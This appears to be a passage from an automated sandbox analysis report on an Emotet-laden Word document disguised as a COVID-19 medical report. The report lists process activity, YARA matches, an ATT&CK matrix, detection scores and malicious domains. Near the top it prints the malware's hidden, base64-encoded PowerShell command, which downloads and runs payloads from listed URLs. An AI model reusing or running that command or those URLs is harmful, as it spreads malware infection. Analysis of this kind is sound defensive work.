ACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvAC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 00000008.00000002.2121216068.0000000000290000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2110577655.0000000000230000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2145222435.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2334223344.0000000000160000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2121359913.0000000000700000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2122851678.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2145232978.00000000001C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2155705121.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2335867328.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2110590102.0000000000250000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2155718494.0000000000200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2131220245.0000000000150000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2131240758.0000000000170000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2334238430.0000000000180000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.2149683472.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2133987769.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2156224518.0000000010000000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.150000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.290000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.180000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1c0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.250000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.10000000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.290000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.230000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.10000000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.10000000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.700000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.150000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.180000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.200000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.1d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.rundll32.exe.170000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.250000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.700000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.10000000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.rundll32.exe.160000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery11Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsScripting32Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsPowerShell3Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol13Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonScripting32Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information11Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 354471 Sample: IU-8549 Medical report COVI... Startdate: 17/02/2021 Architecture: WINDOWS Score: 100 46 197.211.245.21 ZOL-ASGB Mauritius 2->46 48 217.20.166.178 WNETUS Ukraine 2->48 50 91 other IPs or domains 2->50 64 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->64 66 Multi AV Scanner detection for domain / URL 2->66 68 Found malware configuration 2->68 70 18 other signatures 2->70 14 cmd.exe 2->14         started        17 WINWORD.EXE 293 28 2->17         started        signatures3 process4 signatures5 78 Suspicious powershell command line found 14->78 80 Very long command line found 14->80 82 Encrypted powershell cmdline option found 14->82 19 powershell.exe 12 9 14->19         started        24 msg.exe 14->24         started        process6 dnsIp7 52 ie-best.net 192.185.52.115, 49169, 80 UNIFIEDLAYER-AS-1US United States 19->52 54 vanddnabhargave.com 166.62.10.32, 49168, 80 AS-26496-GO-DADDY-COM-LLCUS United States 19->54 56 2 other IPs or domains 19->56 44 C:\Users\user44k2duhbbehaviorgraphxlh9ia6_R.dll, PE32 19->44 dropped 74 Powershell drops PE file 19->74 26 rundll32.exe 19->26         started        file8 signatures9 process10 process11 28 rundll32.exe 26->28         started        process12 30 rundll32.exe 2 28->30         started        signatures13 84 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->84 33 rundll32.exe 30->33         started        process14 process15 35 rundll32.exe 1 33->35         started        signatures16 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 35->72 38 rundll32.exe 35->38         started        process17 process18 40 rundll32.exe 9 38->40         started        dnsIp19 58 162.241.204.233, 49173, 49174, 8080 UNIFIEDLAYER-AS-1US United States 40->58 60 69.38.130.14, 80 TWRS-NYCUS United States 40->60 62 2 other IPs or domains 40->62 76 System process connects to network (likely due to code injection or exploit) 40->76 signatures20

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      IU-8549 Medical report COVID-19.doc63%VirustotalBrowse
                      IU-8549 Medical report COVID-19.doc59%MetadefenderBrowse
                      IU-8549 Medical report COVID-19.doc83%ReversingLabsDocument-Word.Trojan.Emotet

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll100%Joe Sandbox ML
                      C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll46%MetadefenderBrowse
                      C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll93%ReversingLabsWin32.Trojan.EmotetCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      11.2.rundll32.exe.200000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.10000000.11.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.10000000.8.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.180000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.1c0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.10000000.8.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.250000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      7.2.rundll32.exe.230000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      11.2.rundll32.exe.10000000.8.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.150000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      9.2.rundll32.exe.170000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.1a0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.700000.1.unpack100%AviraHEUR/AGEN.1110387Download File
                      10.2.rundll32.exe.10000000.12.unpack100%AviraHEUR/AGEN.1110387Download File
                      8.2.rundll32.exe.10000000.12.unpack100%AviraHEUR/AGEN.1110387Download File
                      12.2.rundll32.exe.160000.0.unpack100%AviraHEUR/AGEN.1110387Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      vanddnabhargave.com6%VirustotalBrowse
                      ie-best.net5%VirustotalBrowse
                      bhaktivrind.com2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://ocsp.sectigo.com00%URL Reputationsafe
                      http://cab.mykfn.com/admin/X/100%Avira URL Cloudmalware
                      http://bhaktivrind.com0%Avira URL Cloudsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
                      http://ie-best.net0%Avira URL Cloudsafe
                      http://java.c0%Avira URL Cloudsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://www.icra.org/vocabulary/.0%URL Reputationsafe
                      http://gocphongthe.com/wp-content/lMMC/100%Avira URL Cloudmalware
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                      http://ie-best.net/online-timer-kvhxz/ilXL/100%Avira URL Cloudmalware
                      http://www.letscompareonline.com/de.letscompareonline.com/wYd/100%Avira URL Cloudmalware
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      https://sectigo.com/CPS0D0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://www.%s.comPA0%URL Reputationsafe
                      http://bhaktivrind.com/cgi-bin/JBbb8/100%Avira URL Cloudmalware
                      http://vanddnabhargave.com/asset/W9o/100%Avira URL Cloudmalware
                      http://cab.mH0%Avira URL Cloudsafe
                      http://cab.mykfn.com0%Avira URL Cloudsafe
                      http://vanddnabhargave.com0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      vanddnabhargave.com
                      166.62.10.32
                      truetrueunknown
                      ie-best.net
                      192.185.52.115
                      truetrueunknown
                      bhaktivrind.com
                      166.62.28.130
                      truetrueunknown
                      cab.mykfn.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://ie-best.net/online-timer-kvhxz/ilXL/true
                        • Avira URL Cloud: malware
                        unknown
                        http://bhaktivrind.com/cgi-bin/JBbb8/true
                        • Avira URL Cloud: malware
                        unknown
                        http://vanddnabhargave.com/asset/W9o/true
                        • Avira URL Cloud: malware
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpfalse
                          high
                          http://investor.msn.comrundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpfalse
                            high
                            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpfalse
                              high
                              http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://cab.mykfn.com/admin/X/powershell.exe, 00000005.00000002.2107203332.000000001B538000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://bhaktivrind.compowershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              unknown
                              http://cambiasuhistoria.growlab.es/wp-content/hGhY2/Ppowershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmpfalse
                                high
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpfalse
                                  high
                                  http://ie-best.netpowershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmptrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://java.cpowershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpfalse
                                    high
                                    http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2111927523.0000000001E57000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110821787.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121763735.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131595672.0000000002007000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2146304517.0000000002197000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
